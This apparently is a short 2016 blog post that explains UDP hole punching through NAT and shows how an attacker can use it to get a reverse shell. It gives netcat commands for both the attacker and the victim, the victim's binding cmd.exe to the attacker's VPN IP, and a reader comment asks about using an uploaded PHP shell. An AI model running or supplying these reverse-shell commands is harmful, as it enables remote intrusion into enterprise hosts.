Monday, July 11, 2016

LAN to VPN Reverse shell (UDP Hole punching)

Did you know that you can use netcat in UDP mode?

Why it is useful?

Imagine two hosts: Alice and Bob that both located behind NAT. And they want to exchange some data... In TCP scheme you can't accomplish that without port forwarding, but with UDP...

This technique called UDP hole punching:
1. Alice sends packet to Bob's public IP, lets say 2.2.2.2, any statefull packet inspection (SPI) firewall will start session from Alice local host to 2.2.2.2:1234.
2. Bob's firewall will drop that packet.
3. Bob sends another packet to Alice's public IP, lets say 3.3.3.3:1234, and again Bob's SPI firewall will start session.
4. Woala! Alice got UDP packet from bob.
From now, both Alive and Bob have opened sessions and may communicate each other without interference.



How it may look from an attacker's view?
Easy. Hacker that stay behind of some kind VPN may get reverse shell on your local host in enterprise network.
This way:

On attacker host:
nc -up vpn_port attackerVPNpublicIP victim_source_port

On victim host:
nc -up victim_source_port attackerVPNpublicIP vpn_port -e c:\windows\system32\cmd.exe

Proof of Concept:
Any bittorrent client :)


More info:
https://en.wikipedia.org/wiki/UDP_hole_punching
http://resources.infosecinstitute.com/udp-hole-punching/


4 comments:

  1. But why it doesnt work for tcp ?

    ReplyDelete
  2. Thanks really!
    How do you connect if just can upload a php shell to server, but you don't exec commands, just ftp

    ReplyDelete